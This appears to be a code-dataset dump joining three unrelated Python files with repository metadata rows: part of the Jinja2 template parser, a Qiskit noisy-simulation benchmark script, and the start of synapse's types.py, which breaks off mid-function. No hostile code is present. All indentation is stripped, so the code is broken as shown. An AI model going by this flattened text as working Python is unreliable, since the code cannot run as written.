def _fail_ut_eof(self, name, end_token_stack, lineno):
expected = []
for exprs in end_token_stack:
expected.extend(imap(describe_token_expr, exprs))
if end_token_stack:
currently_looking = ' or '.join(
"'%s'" % describe_token_expr(expr)
for expr in end_token_stack[-1])
else:
currently_looking = None
if name is None:
message = ['Unexpected end of template.']
else:
message = ['Encountered unknown tag \'%s\'.' % name]
if currently_looking:
if name is not None and name in expected:
message.append('You probably made a nesting mistake. Jinja '
'is expecting this tag, but currently looking '
'for %s.' % currently_looking)
else:
message.append('Jinja was looking for the following tags: '
'%s.' % currently_looking)
if self._tag_stack:
message.append('The innermost block that needs to be '
'closed is \'%s\'.' % self._tag_stack[-1])
self.fail(' '.join(message), lineno)
def fail_unknown_tag(self, name, lineno=None):
"""Called if the parser encounters an unknown tag. Tries to fail
with a human readable error message that could help to identify
the problem.
"""
return self._fail_ut_eof(name, self._end_token_stack, lineno)
def fail_eof(self, end_tokens=None, lineno=None):
"""Like fail_unknown_tag but for end of template situations."""
stack = list(self._end_token_stack)
if end_tokens is not None:
stack.append(end_tokens)
return self._fail_ut_eof(None, stack, lineno)
def is_tuple_end(self, extra_end_rules=None):
"""Are we at the end of a tuple?"""
if self.stream.current.type in ('variable_end', 'block_end', 'rparen'):
return True
elif extra_end_rules is not None:
return self.stream.current.test_any(extra_end_rules)
return False
def free_identifier(self, lineno=None):
"""Return a new free identifier as :class:`~jinja2.nodes.InternalName`."""
self._last_identifier += 1
rv = object.__new__(nodes.InternalName)
nodes.Node.__init__(rv, 'fi%d' % self._last_identifier, lineno=lineno)
return rv
def parse_statement(self):
"""Parse a single statement."""
token = self.stream.current
if token.type != 'name':
self.fail('tag name expected', token.lineno)
self._tag_stack.append(token.value)
pop_tag = True
try:
if token.value in _statement_keywords:
return getattr(self, 'parse_' + self.stream.current.value)()
if token.value == 'call':
return self.parse_call_block()
if token.value == 'filter':
return self.parse_filter_block()
ext = self.extensions.get(token.value)
if ext is not None:
return ext(self)
# did not work out, remove the token we pushed by accident
# from the stack so that the unknown tag fail function can
# produce a proper error message.
self._tag_stack.pop()
pop_tag = False
self.fail_unknown_tag(token.value, token.lineno)
finally:
if pop_tag:
self._tag_stack.pop()
def parse_statements(self, end_tokens, drop_needle=False):
"""Parse multiple statements into a list until one of the end tokens
is reached. This is used to parse the body of statements as it also
parses template data if appropriate. The parser checks first if the
current token is a colon and skips it if there is one. Then it checks
for the block end and parses until if one of the `end_tokens` is
reached. Per default the active token in the stream at the end of
the call is the matched end token. If this is not wanted `drop_needle`
can be set to `True` and the end token is removed.
"""
# the first token may be a colon for python compatibility
self.stream.skip_if('colon')
# in the future it would be possible to add whole code sections
# by adding some sort of end of statement token and parsing those here.
self.stream.expect('block_end')
result = self.subparse(end_tokens)
# we reached the end of the template too early, the subparser
# does not check for this, so we do that now
if self.stream.current.type == 'eof':
self.fail_eof(end_tokens)
if drop_needle:
next(self.stream)
return result
def parse_set(self):
"""Parse an assign statement."""
lineno = next(self.stream).lineno
target = self.parse_assign_target(with_namespace=True)
if self.stream.skip_if('assign'):
expr = self.parse_tuple()
return nodes.Assign(target, expr, lineno=lineno)
filter_node = self.parse_filter(None)
body = self.parse_statements(('name:endset',),
drop_needle=True)
return nodes.AssignBlock(target, filter_node, body, lineno=lineno)
def parse_for(self):
"""Parse a for loop."""
lineno = self.stream.expect('name:for').lineno
target = self.parse_assign_target(extra_end_rules=('name:in',))
self.stream.expect('name:in')
iter = self.parse_tuple(with_condexpr=False,
extra_end_rules=('name:recursive',))
test = None
if self.stream.skip_if('name:if'):
test = self.parse_expression()
recursive = self.stream.skip_if('name:recursive')
body = self.parse_statements(('name:endfor', 'name:else'))
if next(self.stream).value == 'endfor':
else_ = []
else:
else_ = self.parse_statements(('name:endfor',), drop_needle=True)
return nodes.For(target, iter, body, else_, test,
recursive, lineno=lineno)
def parse_if(self):
"""Parse an if construct."""
node = result = nodes.If(lineno=self.stream.expect('name:if').lineno)
while 1:
node.test = self.parse_tuple(with_condexpr=False)
node.body = self.parse_statements(('name:elif', 'name:else',
'name:endif'))
node.elif_ = []
node.else_ = []
token = next(self.stream)
if token.test('name:elif'):
node = nodes.If(lineno=self.stream.current.lineno)
result.elif_.append(node)
continue
elif token.test('name:else'):
result.else_ = self.parse_statements(('name:endif',),
drop_needle=True)
break
return result
def parse_with(self):
node = nodes.With(lineno=next(self.stream).lineno)
targets = []
values = []
while self.stream.current.type != 'block_end':
lineno = self.stream.current.lineno
if targets:
self.stream.expect('comma')
target = self.parse_assign_target()
target.set_ctx('param')
targets.append(target)
self.stream.expect('assign')
values.append(self.parse_expression())
node.targets = targets
node.values = values
node.body = self.parse_statements(('name:endwith',),
drop_needle=True)
return node
def parse_autoescape(self):
node = nodes.ScopedEvalContextModifier(lineno=next(self.stream).lineno)
node.options = [
nodes.Keyword('autoescape', self.parse_expression())
]
node.body = self.parse_statements(('name:endautoescape',),
drop_needle=True)
return nodes.Scope([node])
def parse_block(self):
node = nodes.Block(lineno=next(self.stream).lineno)
node.name = self.stream.expect('name').value
node.scoped = self.stream.skip_if('name:scoped')
# common problem people encounter when switching from django
# to jinja. we do not support hyphens in block names, so let's
# raise a nicer error message in that case.
if self.stream.current.type == 'sub':
self.fail('Block names in Jinja have to be valid Python '
'identifiers and may not contain hyphens, use an '
'underscore instead.')
node.body = self.parse_statements(('name:endblock',), drop_needle=True)
self.stream.skip_if('name:' + node.name)
return node
def parse_extends(self):
node = nodes.Extends(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
return node
def parse_import_context(self, node, default):
if self.stream.current.test_any('name:with', 'name:without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
else:
node.with_context = default
return node
def parse_include(self):
node = nodes.Include(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
if self.stream.current.test('name:ignore') and \
self.stream.look().test('name:missing'):
node.ignore_missing = True
self.stream.skip(2)
else:
node.ignore_missing = False
return self.parse_import_context(node, True)
def parse_import(self):
node = nodes.Import(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:as')
node.target = self.parse_assign_target(name_only=True).name
return self.parse_import_context(node, False)
def parse_from(self):
node = nodes.FromImport(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:import')
node.names = []
def parse_context():
if self.stream.current.value in ('with', 'without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
return True
return False
while 1:
if node.names:
self.stream.expect('comma')
if self.stream.current.type == 'name':
if parse_context():
break
target = self.parse_assign_target(name_only=True)
if target.name.startswith('_'):
self.fail('names starting with an underline can not '
'be imported', target.lineno,
exc=TemplateAssertionError)
if self.stream.skip_if('name:as'):
alias = self.parse_assign_target(name_only=True)
node.names.append((target.name, alias.name))
else:
node.names.append(target.name)
if parse_context() or self.stream.current.type != 'comma':
break
else:
self.stream.expect('name')
if not hasattr(node, 'with_context'):
node.with_context = False
return node
def parse_signature(self, node):
node.args = args = []
node.defaults = defaults = []
self.stream.expect('lparen')
while self.stream.current.type != 'rparen':
if args:
self.stream.expect('comma')
arg = self.parse_assign_target(name_only=True)
arg.set_ctx('param')
if self.stream.skip_if('assign'):
defaults.append(self.parse_expression())
elif defaults:
self.fail('non-default argument follows default argument')
args.append(arg)
self.stream.expect('rparen')
def parse_call_block(self):
node = nodes.CallBlock(lineno=next(self.stream).lineno)
if self.stream.current.type == 'lparen':
self.parse_signature(node)
else:
node.args = []
node.defaults = []
node.call = self.parse_expression()
if not isinstance(node.call, nodes.Call):
self.fail('expected call', node.lineno)
node.body = self.parse_statements(('name:endcall',), drop_needle=True)
return node
def parse_filter_block(self):
node = nodes.FilterBlock(lineno=next(self.stream).lineno)
node.filter = self.parse_filter(None, start_inline=True)
node.body = self.parse_statements(('name:endfilter',),
drop_needle=True)
return node
def parse_macro(self):
node = nodes.Macro(lineno=next(self.stream).lineno)
node.name = self.parse_assign_target(name_only=True).name
self.parse_signature(node)
node.body = self.parse_statements(('name:endmacro',),
drop_needle=True)
return node
def parse_print(self):
node = nodes.Output(lineno=next(self.stream).lineno)
node.nodes = []
while self.stream.current.type != 'block_end':
if node.nodes:
self.stream.expect('comma')
node.nodes.append(self.parse_expression())
return node
def parse_assign_target(self, with_tuple=True, name_only=False,
extra_end_rules=None, with_namespace=False):
"""Parse an assignment target. As Jinja allows assignments to
tuples, this function can parse all allowed assignment targets. Per
default assignments to tuples are parsed, that can be disable however
by setting `with_tuple` to `False`. If only assignments to names are
wanted `name_only` can be set to `True`. The `extra_end_rules`
parameter is forwarded to the tuple parsing function. If
`with_namespace` is enabled, a namespace assignment may be parsed.
"""
if with_namespace and self.stream.look().type == 'dot':
token = self.stream.expect('name')
next(self.stream) # dot
attr = self.stream.expect('name')
target = nodes.NSRef(token.value, attr.value, lineno=token.lineno)
elif name_only:
token = self.stream.expect('name')
target = nodes.Name(token.value, 'store', lineno=token.lineno)
else:
if with_tuple:
target = self.parse_tuple(simplified=True,
extra_end_rules=extra_end_rules)
else:
target = self.parse_primary()
target.set_ctx('store')
if not target.can_assign():
self.fail('can\'t assign to %r' % target.__class__.
__name__.lower(), target.lineno)
return target
def parse_expression(self, with_condexpr=True):
"""Parse an expression. Per default all expressions are parsed, if
the optional `with_condexpr` parameter is set to `False` conditional
expressions are not parsed.
"""
if with_condexpr:
return self.parse_condexpr()
return self.parse_or()
def parse_condexpr(self):
lineno = self.stream.current.lineno
expr1 = self.parse_or()
while self.stream.skip_if('name:if'):
expr2 = self.parse_or()
if self.stream.skip_if('name:else'):
expr3 = self.parse_condexpr()
else:
expr3 = None
expr1 = nodes.CondExpr(expr2, expr1, expr3, lineno=lineno)
lineno = self.stream.current.lineno
return expr1
def parse_or(self):
lineno = self.stream.current.lineno
left = self.parse_and()
while self.stream.skip_if('name:or'):
right = self.parse_and()
left = nodes.Or(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_and(self):
lineno = self.stream.current.lineno
left = self.parse_not()
while self.stream.skip_if('name:and'):
right = self.parse_not()
left = nodes.And(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_not(self):
if self.stream.current.test('name:not'):
lineno = next(self.stream).lineno
return nodes.Not(self.parse_not(), lineno=lineno)
return self.parse_compare()
def parse_compare(self):
lineno = self.stream.current.lineno
expr = self.parse_math1()
ops = []
while 1:
token_type = self.stream.current.type
if token_type in _compare_operators:
next(self.stream)
ops.append(nodes.Operand(token_type, self.parse_math1()))
elif self.stream.skip_if('name:in'):
ops.append(nodes.Operand('in', self.parse_math1()))
elif (self.stream.current.test('name:not') and
self.stream.look().test('name:in')):
self.stream.skip(2)
ops.append(nodes.Operand('notin', self.parse_math1()))
else:
break
lineno = self.stream.current.lineno
if not ops:
return expr
return nodes.Compare(expr, ops, lineno=lineno)
def parse_math1(self):
lineno = self.stream.current.lineno
left = self.parse_concat()
while self.stream.current.type in ('add', 'sub'):
cls = _math_nodes[self.stream.current.type]
next(self.stream)
right = self.parse_concat()
left = cls(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_concat(self):
lineno = self.stream.current.lineno
args = [self.parse_math2()]
while self.stream.current.type == 'tilde':
next(self.stream)
args.append(self.parse_math2())
if len(args) == 1:
return args[0]
return nodes.Concat(args, lineno=lineno)
def parse_math2(self):
lineno = self.stream.current.lineno
left = self.parse_pow()
while self.stream.current.type in ('mul', 'div', 'floordiv', 'mod'):
cls = _math_nodes[self.stream.current.type]
next(self.stream)
right = self.parse_pow()
left = cls(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_pow(self):
lineno = self.stream.current.lineno
left = self.parse_unary()
while self.stream.current.type == 'pow':
next(self.stream)
right = self.parse_unary()
left = nodes.Pow(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_unary(self, with_filter=True):
token_type = self.stream.current.type
lineno = self.stream.current.lineno
if token_type == 'sub':
next(self.stream)
node = nodes.Neg(self.parse_unary(False), lineno=lineno)
elif token_type == 'add':
next(self.stream)
node = nodes.Pos(self.parse_unary(False), lineno=lineno)
else:
node = self.parse_primary()
node = self.parse_postfix(node)
if with_filter:
node = self.parse_filter_expr(node)
return node
def parse_primary(self):
token = self.stream.current
if token.type == 'name':
if token.value in ('true', 'false', 'True', 'False'):
node = nodes.Const(token.value in ('true', 'True'),
lineno=token.lineno)
elif token.value in ('none', 'None'):
node = nodes.Const(None, lineno=token.lineno)
else:
node = nodes.Name(token.value, 'load', lineno=token.lineno)
next(self.stream)
elif token.type == 'string':
next(self.stream)
buf = [token.value]
lineno = token.lineno
while self.stream.current.type == 'string':
buf.append(self.stream.current.value)
next(self.stream)
node = nodes.Const(''.join(buf), lineno=lineno)
elif token.type in ('integer', 'float'):
next(self.stream)
node = nodes.Const(token.value, lineno=token.lineno)
elif token.type == 'lparen':
next(self.stream)
node = self.parse_tuple(explicit_parentheses=True)
self.stream.expect('rparen')
elif token.type == 'lbracket':
node = self.parse_list()
elif token.type == 'lbrace':
node = self.parse_dict()
else:
self.fail("unexpected '%s'" % describe_token(token), token.lineno)
return node
def parse_tuple(self, simplified=False, with_condexpr=True,
extra_end_rules=None, explicit_parentheses=False):
"""Works like `parse_expression` but if multiple expressions are
delimited by a comma a :class:`~jinja2.nodes.Tuple` node is created.
This method could also return a regular expression instead of a tuple
if no commas where found.
The default parsing mode is a full tuple. If `simplified` is `True`
only names and literals are parsed. The `no_condexpr` parameter is
forwarded to :meth:`parse_expression`.
Because tuples do not require delimiters and may end in a bogus comma
an extra hint is needed that marks the end of a tuple. For example
for loops support tuples between `for` and `in`. In that case the
`extra_end_rules` is set to ``['name:in']``.
`explicit_parentheses` is true if the parsing was triggered by an
expression in parentheses. This is used to figure out if an empty
tuple is a valid expression or not.
"""
lineno = self.stream.current.lineno
if simplified:
parse = self.parse_primary
elif with_condexpr:
parse = self.parse_expression
else:
parse = lambda: self.parse_expression(with_condexpr=False)
args = []
is_tuple = False
while 1:
if args:
self.stream.expect('comma')
if self.is_tuple_end(extra_end_rules):
break
args.append(parse())
if self.stream.current.type == 'comma':
is_tuple = True
else:
break
lineno = self.stream.current.lineno
if not is_tuple:
if args:
return args[0]
# if we don't have explicit parentheses, an empty tuple is
# not a valid expression. This would mean nothing (literally
# nothing) in the spot of an expression would be an empty
# tuple.
if not explicit_parentheses:
self.fail('Expected an expression, got \'%s\'' %
describe_token(self.stream.current))
return nodes.Tuple(args, 'load', lineno=lineno)
def parse_list(self):
token = self.stream.expect('lbracket')
items = []
while self.stream.current.type != 'rbracket':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbracket':
break
items.append(self.parse_expression())
self.stream.expect('rbracket')
return nodes.List(items, lineno=token.lineno)
def parse_dict(self):
token = self.stream.expect('lbrace')
items = []
while self.stream.current.type != 'rbrace':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbrace':
break
key = self.parse_expression()
self.stream.expect('colon')
value = self.parse_expression()
items.append(nodes.Pair(key, value, lineno=key.lineno))
self.stream.expect('rbrace')
return nodes.Dict(items, lineno=token.lineno)
def parse_postfix(self, node):
while 1:
token_type = self.stream.current.type
if token_type == 'dot' or token_type == 'lbracket':
node = self.parse_subscript(node)
# calls are valid both after postfix expressions (getattr
# and getitem) as well as filters and tests
elif token_type == 'lparen':
node = self.parse_call(node)
else:
break
return node
def parse_filter_expr(self, node):
while 1:
token_type = self.stream.current.type
if token_type == 'pipe':
node = self.parse_filter(node)
elif token_type == 'name' and self.stream.current.value == 'is':
node = self.parse_test(node)
# calls are valid both after postfix expressions (getattr
# and getitem) as well as filters and tests
elif token_type == 'lparen':
node = self.parse_call(node)
else:
break
return node
def parse_subscript(self, node):
token = next(self.stream)
if token.type == 'dot':
attr_token = self.stream.current
next(self.stream)
if attr_token.type == 'name':
return nodes.Getattr(node, attr_token.value, 'load',
lineno=token.lineno)
elif attr_token.type != 'integer':
self.fail('expected name or number', attr_token.lineno)
arg = nodes.Const(attr_token.value, lineno=attr_token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
if token.type == 'lbracket':
args = []
while self.stream.current.type != 'rbracket':
if args:
self.stream.expect('comma')
args.append(self.parse_subscribed())
self.stream.expect('rbracket')
if len(args) == 1:
arg = args[0]
else:
arg = nodes.Tuple(args, 'load', lineno=token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
self.fail('expected subscript expression', token.lineno)
def parse_subscribed(self):
lineno = self.stream.current.lineno
if self.stream.current.type == 'colon':
next(self.stream)
args = [None]
else:
node = self.parse_expression()
if self.stream.current.type != 'colon':
return node
next(self.stream)
args = [node]
if self.stream.current.type == 'colon':
args.append(None)
elif self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
if self.stream.current.type == 'colon':
next(self.stream)
if self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
else:
args.append(None)
return nodes.Slice(lineno=lineno, *args)
def parse_call(self, node):
token = self.stream.expect('lparen')
args = []
kwargs = []
dyn_args = dyn_kwargs = None
require_comma = False
def ensure(expr):
if not expr:
self.fail('invalid syntax for function call expression',
token.lineno)
while self.stream.current.type != 'rparen':
if require_comma:
self.stream.expect('comma')
# support for trailing comma
if self.stream.current.type == 'rparen':
break
if self.stream.current.type == 'mul':
ensure(dyn_args is None and dyn_kwargs is None)
next(self.stream)
dyn_args = self.parse_expression()
elif self.stream.current.type == 'pow':
ensure(dyn_kwargs is None)
next(self.stream)
dyn_kwargs = self.parse_expression()
else:
if self.stream.current.type == 'name' and \
self.stream.look().type == 'assign':
# Parsing a kwarg
ensure(dyn_kwargs is None)
key = self.stream.current.value
self.stream.skip(2)
value = self.parse_expression()
kwargs.append(nodes.Keyword(key, value,
lineno=value.lineno))
else:
# Parsing an arg
ensure(dyn_args is None and dyn_kwargs is None and not kwargs)
args.append(self.parse_expression())
require_comma = True
self.stream.expect('rparen')
if node is None:
return args, kwargs, dyn_args, dyn_kwargs
return nodes.Call(node, args, kwargs, dyn_args, dyn_kwargs,
lineno=token.lineno)
def parse_filter(self, node, start_inline=False):
while self.stream.current.type == 'pipe' or start_inline:
if not start_inline:
next(self.stream)
token = self.stream.expect('name')
name = token.value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
else:
args = []
kwargs = []
dyn_args = dyn_kwargs = None
node = nodes.Filter(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
start_inline = False
return node
def parse_test(self, node):
token = next(self.stream)
if self.stream.current.test('name:not'):
next(self.stream)
negated = True
else:
negated = False
name = self.stream.expect('name').value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
dyn_args = dyn_kwargs = None
kwargs = []
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
elif (self.stream.current.type in ('name', 'string', 'integer',
'float', 'lparen', 'lbracket',
'lbrace') and not
self.stream.current.test_any('name:else', 'name:or',
'name:and')):
if self.stream.current.test('name:is'):
self.fail('You cannot chain multiple tests with is')
arg_node = self.parse_primary()
arg_node = self.parse_postfix(arg_node)
args = [arg_node]
else:
args = []
node = nodes.Test(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
if negated:
node = nodes.Not(node, lineno=token.lineno)
return node
def subparse(self, end_tokens=None):
body = []
data_buffer = []
add_data = data_buffer.append
if end_tokens is not None:
self._end_token_stack.append(end_tokens)
def flush_data():
if data_buffer:
lineno = data_buffer[0].lineno
body.append(nodes.Output(data_buffer[:], lineno=lineno))
del data_buffer[:]
try:
while self.stream:
token = self.stream.current
if token.type == 'data':
if token.value:
add_data(nodes.TemplateData(token.value,
lineno=token.lineno))
next(self.stream)
elif token.type == 'variable_begin':
next(self.stream)
add_data(self.parse_tuple(with_condexpr=True))
self.stream.expect('variable_end')
elif token.type == 'block_begin':
flush_data()
next(self.stream)
if end_tokens is not None and \
self.stream.current.test_any(*end_tokens):
return body
rv = self.parse_statement()
if isinstance(rv, list):
body.extend(rv)
else:
body.append(rv)
self.stream.expect('block_end')
else:
raise AssertionError('internal parsing error')
flush_data()
finally:
if end_tokens is not None:
self._end_token_stack.pop()
return body
def parse(self):
"""Parse the whole template into a `Template` node."""
result = nodes.Template(self.subparse(), lineno=1)
result.set_environment(self.environment)
return result
| 39.713656 | 82 | 0.559013 |
1dc2475117c0ab3ba67abcc868afaf8cb91bea9c | 4,199 | py | Python | benchmark/startQiskit_noisy2667.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_noisy2667.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_noisy2667.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=19
prog.y(input_qubit[2]) # number=36
prog.cz(input_qubit[0],input_qubit[3]) # number=20
prog.h(input_qubit[3]) # number=21
prog.cx(input_qubit[0],input_qubit[3]) # number=14
prog.cx(input_qubit[0],input_qubit[3]) # number=25
prog.cx(input_qubit[0],input_qubit[3]) # number=28
prog.x(input_qubit[3]) # number=29
prog.cx(input_qubit[0],input_qubit[3]) # number=30
prog.cx(input_qubit[3],input_qubit[1]) # number=35
prog.y(input_qubit[2]) # number=34
prog.cx(input_qubit[0],input_qubit[3]) # number=27
prog.h(input_qubit[3]) # number=22
prog.cz(input_qubit[0],input_qubit[3]) # number=23
prog.h(input_qubit[3]) # number=24
prog.cx(input_qubit[0],input_qubit[3]) # number=13
prog.h(input_qubit[3]) # number=18
prog.z(input_qubit[3]) # number=10
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.h(input_qubit[0]) # number=37
prog.cz(input_qubit[3],input_qubit[0]) # number=38
prog.h(input_qubit[0]) # number=39
prog.z(input_qubit[3]) # number=32
prog.cx(input_qubit[3],input_qubit[0]) # number=33
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = FakeVigo()
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy2667.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 34.702479 | 140 | 0.654203 |
78f3d1419de5568be8b1d6bfd895e87b23bf907f | 37,559 | py | Python | synapse/lib/types.py | larrycameron80/synapse | 24bf21c40b4a467e5dc28c8204aecaf502d5cddf | [
"Apache-2.0"
] | null | null | null | synapse/lib/types.py | larrycameron80/synapse | 24bf21c40b4a467e5dc28c8204aecaf502d5cddf | [
"Apache-2.0"
] | null | null | null | synapse/lib/types.py | larrycameron80/synapse | 24bf21c40b4a467e5dc28c8204aecaf502d5cddf | [
"Apache-2.0"
] | null | null | null | import json
import base64
import logging
import collections
import regex
import synapse.common as s_common
import synapse.dyndeps as s_dyndeps
import synapse.lib.time as s_time
import synapse.lib.syntax as s_syntax
import synapse.lib.modules as s_modules
import synapse.lib.msgpack as s_msgpack
import synapse.lookup.iso3166 as s_l_iso3166
logger = logging.getLogger(__name__)
class DataType:
subprops = ()
def __init__(self, tlib, name, **info):
self.tlib = tlib
self.name = name
self.info = info
self.prop = self.info.get('prop')
s_common.reqStorDict(info)
def _raiseBadValu(self, valu, **info):
raise s_common.BadTypeValu(name=self.name, valu=valu, **info)
def get(self, prop, defval=None):
'''
Retrieve a type info property from this type or parent types.
Example:
ex = item.get('doc')
'''
return self.tlib.getTypeInfo(self.name, prop, defval=defval)
def subs(self):
'''
Implement if the presence of a property with this type requires sub props.
'''
return self.subprops
def extend(self, name, **info):
'''
Construct a new subtype from this instance.
'''
for k, v in self.info.items():
info.setdefault(k, v)
return self.__class__(self.tlib, name, **info)
def parse(self, text, oldval=None):
'''
Parse input text and return the system mode (normalized) value for the type.
Example:
valu = tobj.parse(text)
'''
return self.norm(text, oldval=oldval)
def repr(self, valu):
return valu
class GuidType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self._guid_alias = info.get('alias')
# TODO figure out what to do about tlib vs core issues
self._getTufoByProp = getattr(tlib, 'getTufoByProp', None)
self._reqPropNorm = getattr(tlib, 'reqPropNorm', None)
def norm(self, valu, oldval=None):
if isinstance(valu, dict):
vals = list(valu.items())
return self._norm_list(vals, oldval)
if isinstance(valu, (list, tuple)):
return self._norm_list(valu, oldval)
if not isinstance(valu, str) or len(valu) < 1:
self._raiseBadValu(valu)
return self._norm_str(valu, oldval)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if text[0] == '(':
vals, off = s_syntax.parse_list(text)
if off != len(text):
self._raiseBadValu(text, off=off, vals=vals,
mesg='List parting for guid type did not consume all of the input text.')
return self._norm_list(vals, oldval)
# generate me one. we dont care.
if text == '*':
return s_common.guid(), {}
if text[0] != '$':
retn = text.lower().replace('-', '')
if not s_common.isguid(retn):
self._raiseBadValu(text, mesg='Expected a 32 char guid string')
return retn, {}
node = self.tlib.getTufoByProp('syn:alias', text)
if node is not None:
return node[1].get('syn:alias:iden'), {}
# TODO remove legacy model aliases
if self._guid_alias is None:
self._raiseBadValu(text, mesg='guid resolver syntax used with non-aliased guid')
if self._getTufoByProp is None:
self._raiseBadValu(text, mesg='guid resolver syntax used with non-cortex tlib')
# ( sigh... eventually everything will be a cortex... )
node = self._getTufoByProp(self._guid_alias, text[1:])
if node is None:
self._raiseBadValu(text, mesg='no result for guid resolver',
alias=self._guid_alias)
iden = node[1].get(node[1].get('tufo:form'))
return iden, {}
def _norm_list(self, valu, oldval=None):
if not valu:
self._raiseBadValu(valu=valu, mesg='No valus present in list to make a guid with')
if not self.prop:
self._raiseBadValu(valu,
mesg='Unable to norm a list for a guidtype which is not associated with a property.')
vals = []
subs = {}
for kv in valu:
if not isinstance(kv, (list, tuple)) or not len(kv) == 2:
self._raiseBadValu(valu, kv=kv, mesg='Expected a list or tuple of length 2')
k, v = kv
fullprop = self.prop + ':' + k
try:
v, ssubs = self._reqPropNorm(fullprop, v)
except s_common.NoSuchProp:
logger.exception('Error while norming list of props for guid type.')
self._raiseBadValu(valu, prop=k, fullprop=fullprop,
mesg='Non-model property provided when making a stable guid.')
subs.update({':'.join([k, _k]): _v for _k, _v in ssubs.items()})
vals.append((k, v))
# Stable sort based on the property
vals.sort(key=lambda x: x[0])
valu = s_common.guid(valu=vals)
subs.update(vals)
return valu, subs
class NDefType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._isTufoForm = getattr(tlib, 'isTufoForm', None)
self._getPropNorm = getattr(tlib, 'getPropNorm', None)
def norm(self, valu, oldval=None):
if isinstance(valu, (list, tuple)):
return self._norm_list(valu, oldval)
if not isinstance(valu, str) or len(valu) < 1:
self._raiseBadValu(valu)
return self._norm_str(valu, oldval)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if text[0] == '(':
vals, off = s_syntax.parse_list(text)
if off != len(text): # pragma: no cover
self._raiseBadValu(text, off=off, vals=vals,
